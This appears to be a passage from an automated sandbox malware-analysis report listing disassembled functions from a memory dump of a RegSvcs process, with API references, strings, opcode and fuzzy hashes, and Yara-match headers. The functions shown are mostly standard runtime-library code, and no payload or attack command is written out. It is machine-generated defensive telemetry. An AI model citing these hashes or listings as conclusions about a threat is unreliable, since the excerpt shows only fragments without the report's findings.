                                                      • Opcode ID: 3967d2100356a427602d8344ce6fef7260dd2e88fbc4018f011d238c0e17fe00
                                                      • Instruction ID: 9dd861ecdb78a8fa8b9149014e93946c85b2eb4dcdf4db7622ce99933c2e1b93
                                                      • Opcode Fuzzy Hash: 3967d2100356a427602d8344ce6fef7260dd2e88fbc4018f011d238c0e17fe00
                                                      • Instruction Fuzzy Hash: 1A418072A00215AFDB219F9AD88199FBBB8EF89311F14206BF404E7351E7B89F41C759
                                                      Function 0042D0CC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0042D0F1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID: MOC$RCC
                                                      • API String ID: 2118026453-2084237596
                                                      • Opcode ID: 09c64a93f39c51a2730a6fe1502235b7bbaa60dad562439b189740cdda0ae7f0
                                                      • Instruction ID: 74c5846a7c847a02cac0a397f4b7201c937f58d9a1eef82dc885650252145cd0
                                                      • Opcode Fuzzy Hash: 09c64a93f39c51a2730a6fe1502235b7bbaa60dad562439b189740cdda0ae7f0
                                                      • Instruction Fuzzy Hash: F6417C71E00219AFCF15DF98ED81AEEBBB5FF48304F54809AF90467221D3399960DB59
                                                      Function 00434513 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID: .FC$p"B
                                                      • API String ID: 269201875-2155700466
                                                      • Opcode ID: 70fcbf996e0e6f783760038de61c3db33e1fb257ea8d8b49847e2c9393cbb7ec
                                                      • Instruction ID: 68a727fadefac230d6b736e8121086cc62c5036a3fa9a85959494b8dd1aa682d
                                                      • Opcode Fuzzy Hash: 70fcbf996e0e6f783760038de61c3db33e1fb257ea8d8b49847e2c9393cbb7ec
                                                      • Instruction Fuzzy Hash: 28314976E00614AF8B14CF59D48089EB7F1EFCD320B2686A6E615EB360D734BD41CB95
                                                      Function 004044C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004044EB
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040453A
                                                        • Part of subcall function 0042894E: _Yarn.LIBCPMT ref: 0042896D
                                                        • Part of subcall function 0042894E: _Yarn.LIBCPMT ref: 00428991
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                      • String ID: bad locale name
                                                      • API String ID: 1908188788-1405518554
                                                      • Opcode ID: 8f86a913a844d6f899e4d3e1e54ff72ab4217549f74eb6dfb6f69a63f5297fa5
                                                      • Instruction ID: 09576b40df86770123bd818f8f6b670a494be638eb9bc01e7c470c2f954602ce
                                                      • Opcode Fuzzy Hash: 8f86a913a844d6f899e4d3e1e54ff72ab4217549f74eb6dfb6f69a63f5297fa5
                                                      • Instruction Fuzzy Hash: EF11E3B15057849FD320CF69C80174BBBE8EF19714F004A1FE489C3B81E7B8A504CB99
                                                      Function 004288DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004288EA
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00428945
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                      • String ID: p"B
                                                      • API String ID: 593203224-2496714718
                                                      • Opcode ID: 845b3c59473143e2723270cd9ca3c719c89f41ed008f8553123bd8ab3fc78832
                                                      • Instruction ID: ee50c7717d1863ac42b5a2078df01cbe2852c83e07850b74666fb46b5f32bdcd
                                                      • Opcode Fuzzy Hash: 845b3c59473143e2723270cd9ca3c719c89f41ed008f8553123bd8ab3fc78832
                                                      • Instruction Fuzzy Hash: D3019E35701214AFCB04DF15D895A6EB7B4EF84750B5440AEE8019B372DF70EE41CB94
                                                      Function 004264A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Cnd_destroy_in_situ.LIBCPMT ref: 004264EB
                                                      • __Mtx_destroy_in_situ.LIBCPMT ref: 004264F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                      • String ID: P7B
                                                      • API String ID: 1432671424-2603120426
                                                      • Opcode ID: ccd7f3ca1439b653eee987ef03ca579b591e52ce490b3c69bf28907680d822df
                                                      • Instruction ID: d1c88c8e554fbe6b09274c26d59dbb3a57fb5c0ab0a95ab02b51eddfb59b484b
                                                      • Opcode Fuzzy Hash: ccd7f3ca1439b653eee987ef03ca579b591e52ce490b3c69bf28907680d822df
                                                      • Instruction Fuzzy Hash: 82F0A4B2A007109BC734EB61F404B5B73E87F44304F85491FE68687A04DB78E548C769
                                                      Function 00423750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Cnd_destroy_in_situ.LIBCPMT ref: 00423778
                                                      • __Mtx_destroy_in_situ.LIBCPMT ref: 00423781
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                      • String ID: P7B
                                                      • API String ID: 1432671424-2603120426
                                                      • Opcode ID: b1826f75059ada2c8c0a135fc30b5ab815db4b115b2b9b45164e8216526a7a3c
                                                      • Instruction ID: 96ac7aa9ad7ad0189e36f29d09ce045fae7f9609e90f85980bcbdc5214f9bfbf
                                                      • Opcode Fuzzy Hash: b1826f75059ada2c8c0a135fc30b5ab815db4b115b2b9b45164e8216526a7a3c
                                                      • Instruction Fuzzy Hash: 8BF0BBF2E0072456D730EAB1F805B4BB7EC5B00705F84443FEA4182541E77DE608C3AA
                                                      Function 004025C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0042B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,004025DC,00420D37,8B18EC83,?,004025DC,?,004644CC), ref: 0042B0B6
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 004025FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise___std_exception_copy
                                                      • String ID: $@$$@
                                                      • API String ID: 3109751735-431066289
                                                      • Opcode ID: f88b156b942917d3ce25798537e797de301e54249081754898d855d002c7be0a
                                                      • Instruction ID: 61d3cdbf6d4730c8e627fa0a969e9d6bbbbb54965134e8bc2004e3e42c3cedd2
                                                      • Opcode Fuzzy Hash: f88b156b942917d3ce25798537e797de301e54249081754898d855d002c7be0a
                                                      • Instruction Fuzzy Hash: 55F0ECB5D0030C67C714EBE5EC01A89B79CDE11304B50892BFA14E7541F7B4B55483DD
                                                      Function 004026B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 004026E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy
                                                      • String ID: $@$$@
                                                      • API String ID: 2659868963-431066289
                                                      • Opcode ID: 01df657bc17a4116ab54f9f0a212d0b7fd6ce72e084689ce09f326f0dc6d807e
                                                      • Instruction ID: 03f67b89f10f46ec2cab451192a6b38b299b70da7d71eea2ce7e9eeb56e0b585
                                                      • Opcode Fuzzy Hash: 01df657bc17a4116ab54f9f0a212d0b7fd6ce72e084689ce09f326f0dc6d807e
                                                      • Instruction Fuzzy Hash: EBF0AE71D1020C9BC714DF68D8415CEBBF49F59304F50826FE84067301E7755A59C7D9
                                                      Function 00402C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00402C53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy
                                                      • String ID: $@$$@
                                                      • API String ID: 2659868963-431066289
                                                      • Opcode ID: bbcdd68c156500cf397594005f789bc5fdfed43ea02ee5aebd829b5492ac51fc
                                                      • Instruction ID: 14bf801db9e66a6fa7a5a7dffa4060d5612c59f4d2a87668b77bcd9987b5cdfb
                                                      • Opcode Fuzzy Hash: bbcdd68c156500cf397594005f789bc5fdfed43ea02ee5aebd829b5492ac51fc
                                                      • Instruction Fuzzy Hash: 5BF0A770D1021C9BC710DF69DC415DDFBF8DF16304F5082AFE84067201EBB52A588799
                                                      Function 00438A59 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00437172,-00000020,00000FA0,00000000,00409EB3,?,0045DBDC,?,00000000), ref: 00438A99
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpin
                                                      • String ID: InitializeCriticalSectionEx$p"B
                                                      • API String ID: 2593887523-3075974992
                                                      • Opcode ID: 91ae5c5d5ab5af27d2f9273bbf7bbb59263ea83e116ccc93701688d6d6eba450
                                                      • Instruction ID: b7078d2f7e2a9a7d2de4669eed30b3bf19e1d4d73391d84db72991b482420f90
                                                      • Opcode Fuzzy Hash: 91ae5c5d5ab5af27d2f9273bbf7bbb59263ea83e116ccc93701688d6d6eba450
                                                      • Instruction Fuzzy Hash: 43E09236140318B7CF113F91EC05E9EBF15EB447A1F244037FE0855172CBB98920EA99
                                                      Function 00402AB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00402ACF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy
                                                      • String ID: 0*@$$@
                                                      • API String ID: 2659868963-3718208268
                                                      • Opcode ID: 9a97c8f9693888ff83184929766bd60e103b75a108f24e01955cb10f2eac2536
                                                      • Instruction ID: 614b477de6e8c5640de8a14e537504f1e93c82954ae98314b452ef9e8d600ffb
                                                      • Opcode Fuzzy Hash: 9a97c8f9693888ff83184929766bd60e103b75a108f24e01955cb10f2eac2536
                                                      • Instruction Fuzzy Hash: 1EE030B6A00705AB8710DF59D400886F7ECFF56210345C62BE92997A00F770B4548BA4
                                                      Function 004388DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Alloc
                                                      • String ID: FlsAlloc$p"B
                                                      • API String ID: 2773662609-2188504205
                                                      • Opcode ID: d844177cb85dd7a1f5b78dcc67520d4300d96cbb445d87c328af39da2b901086
                                                      • Instruction ID: 47d15ae2ff42363451f86f23319a157d959ba9f865dfa935990e61760123bfa9
                                                      • Opcode Fuzzy Hash: d844177cb85dd7a1f5b78dcc67520d4300d96cbb445d87c328af39da2b901086
                                                      • Instruction Fuzzy Hash: 52E0C231684324A392112661AC16BAEFD488F88B63F240027FD05622A2CEAC5A0181DE
                                                      Function 00402620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 0040263E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy
                                                      • String ID: $@$$@
                                                      • API String ID: 2659868963-431066289
                                                      • Opcode ID: 558635a7ccc61f0bc60122d1a6a0c6f937efa3fd6e90750662620f57d6577cfe
                                                      • Instruction ID: b106fe9b25e79094de696bd926096e0897a4f20f916706a9be74182633915edf
                                                      • Opcode Fuzzy Hash: 558635a7ccc61f0bc60122d1a6a0c6f937efa3fd6e90750662620f57d6577cfe
                                                      • Instruction Fuzzy Hash: E7D0C2B291031457C7109F98D800982B7DC9E25215304C52BF944E7201F3B0A89483A8
                                                      Function 00402710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 0040272E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy
                                                      • String ID: $@$$@
                                                      • API String ID: 2659868963-431066289
                                                      • Opcode ID: e6b195883526a2a53baa90a252a76944d6baf243e6444e63a7fcc9898a2285c7
                                                      • Instruction ID: 61be3894f216fc8428f1d06fdec4aa948bede4ca63dadf206ebbafe92ce5d5c3
                                                      • Opcode Fuzzy Hash: e6b195883526a2a53baa90a252a76944d6baf243e6444e63a7fcc9898a2285c7
                                                      • Instruction Fuzzy Hash: 74D0C2B292021457C7109F98D800982B7DC9E15255344C12BF944E7201F370A89483E8